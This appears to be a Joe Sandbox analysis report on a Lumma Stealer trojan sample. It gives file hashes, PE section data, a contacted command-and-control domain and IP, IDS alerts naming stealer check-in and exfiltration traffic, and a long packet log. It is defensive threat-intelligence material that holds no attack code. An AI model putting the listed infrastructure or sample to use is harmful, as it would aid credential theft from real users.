                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.36.201
                                                                                        observerfry.latUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1579986
                                                                                        Start date and time:2024-12-23 17:40:09 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 4m 35s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:5
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:NxqDwaYpbp.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:18a540ae13744f52861c16cb38c7dba4.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 8
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target NxqDwaYpbp.exe, PID 8044 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: NxqDwaYpbp.exe
                                                                                        TimeTypeDescription
                                                                                        11:41:10API Interceptor8x Sleep call for process: NxqDwaYpbp.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.36.2012jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                          OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                            fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                  ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      observerfry.latNAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 172.67.199.72
                                                                                                      U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 172.67.199.72
                                                                                                      s-part-0035.t-0009.t-msedge.netOtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.63
                                                                                                      Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 13.107.246.63
                                                                                                      7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      G3izWAY3Fa.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                      • 13.107.246.63
                                                                                                      FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 13.107.246.63
                                                                                                      mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.63
                                                                                                      4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 13.107.246.63
                                                                                                      nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 13.107.246.63
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUShttp://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                                                                                      • 104.22.54.104
                                                                                                      5diately.msgGet hashmaliciousUnknownBrowse
                                                                                                      • 1.1.1.1
                                                                                                      NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                      • 104.21.63.229
                                                                                                      OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                      • 172.64.41.3
                                                                                                      t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.64.41.3
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      No context
                                                                                                      No created / dropped files found
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.952518536367469
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:NxqDwaYpbp.exe
                                                                                                      File size:1'858'560 bytes
                                                                                                      MD5:18a540ae13744f52861c16cb38c7dba4
                                                                                                      SHA1:c23aa96928ba43535c8d4915ad725c24cfbd61ec
                                                                                                      SHA256:25e1f95be3a9448361402091d0a2862ffdbcfaa6a59acf955df9fa37dfd8dd93
                                                                                                      SHA512:2d8dd30832aae053a8a257bed03ac9c4629df25a1daf080bec209e099805d117caeb0fc83b359219edf39c8c5b084c367d131aaa37f0e06e4946331f3958a54c
                                                                                                      SSDEEP:49152:DQPfOSlg5sw9BstlQC2pCTWci/HMV/U7TFJmXlm:D/rBDpCSF/HEMHSlm
                                                                                                      TLSH:E885335A5AD25E40CC591070837988FDEB49BEE880339F852324AD658A3F7DCC6DE74E
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I......j....@.................................T0..h..
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x89a000
                                                                                                      Entrypoint Section:.taggant
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                      Instruction
                                                                                                      jmp 00007F593886492Ah
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      0x10000x510000x248009e4b39b7a04d1d964e85c24b7bcf2b89False0.9973779965753424data7.98351967554791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      0x540000x2a70000x20010e439cb659adac2354ada60c6e41588unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      zogjhcae0x2fb0000x19e0000x19d8005fc0808e1ab3db22e39e5adc15fd92efFalse0.9944694915734583data7.954190174754569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      rqnwszwu0x4990000x10000x4006b552754fc8024aa179075e1bb46cdaaFalse0.765625data5.976992087579974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .taggant0x49a0000x30000x22001c5ffded6b4be3f6c5f4f61385de3267False0.37028952205882354DOS executable (COM)3.9905014748961096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                      DLLImport
                                                                                                      kernel32.dlllstrcpy
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-23T17:41:10.914371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049707104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:11.671562+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049707104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:11.671562+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049707104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:12.900561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049713104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:13.669950+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049713104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:13.669950+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049713104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:15.281892+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049719104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:18.537141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049725104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:20.831123+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049731104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:23.493718+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049737104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:24.310192+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049737104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:26.141783+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049744104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:26.147194+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1049744104.21.36.201443TCP
                                                                                                      2024-12-23T17:41:29.370442+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049757104.21.36.201443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 23, 2024 17:41:09.692785025 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:09.692842007 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:09.692928076 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:09.694328070 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:09.694344044 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:10.914283037 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:10.914371014 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:10.919042110 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:10.919064999 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:10.919346094 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:10.963958979 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:10.975022078 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:10.975061893 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:10.975167036 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.671576023 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.671670914 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.671734095 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.673644066 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.673681021 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.673707962 CET49707443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.673723936 CET44349707104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.685858011 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.685873032 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:11.685971022 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.686353922 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:11.686368942 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:12.900480986 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:12.900561094 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:12.902851105 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:12.902867079 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:12.903116941 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:12.904933929 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:12.905164957 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:12.905198097 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.669974089 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.670062065 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.670097113 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.670114040 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.670131922 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.670173883 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.670182943 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.679883957 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.679930925 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.679953098 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.679963112 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.680017948 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.688149929 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.729590893 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.729613066 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.776473999 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.789541960 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.838963985 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.838983059 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.864387989 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.864516020 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.864528894 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.872267008 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.872365952 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.872467995 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.872479916 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:13.872502089 CET49713443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:13.872507095 CET44349713104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:14.067322016 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:14.067369938 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:14.067452908 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:14.067779064 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:14.067792892 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:15.281765938 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:15.281892061 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:15.763500929 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:15.763529062 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:15.763899088 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:15.765646935 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:15.766427994 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:15.766458988 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:17.190052986 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:17.190170050 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:17.190320015 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:17.190457106 CET49719443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:17.190473080 CET44349719104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:17.321305037 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:17.321347952 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:17.321417093 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:17.321748972 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:17.321768045 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:18.537062883 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:18.537141085 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:18.538903952 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:18.538914919 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:18.539164066 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:18.540400028 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:18.540611982 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:18.540643930 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:18.540695906 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:18.583348989 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:19.402383089 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:19.402468920 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:19.402534962 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:19.402741909 CET49725443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:19.402756929 CET44349725104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:19.615489006 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:19.615521908 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:19.615612030 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:19.615936995 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:19.615952969 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.831010103 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.831123114 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.835998058 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.836015940 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.836249113 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.837682009 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.837753057 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.837770939 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.837776899 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.837790012 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:20.837836981 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:20.837863922 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:21.927238941 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:21.927357912 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:21.927462101 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:21.927774906 CET49731443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:21.927798986 CET44349731104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:22.279301882 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:22.279347897 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:22.279422998 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:22.279750109 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:22.279767990 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:23.493590117 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:23.493717909 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:23.495521069 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:23.495528936 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:23.495765924 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:23.497083902 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:23.497164965 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:23.497170925 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:24.310178995 CET44349737104.21.36.201192.168.2.10
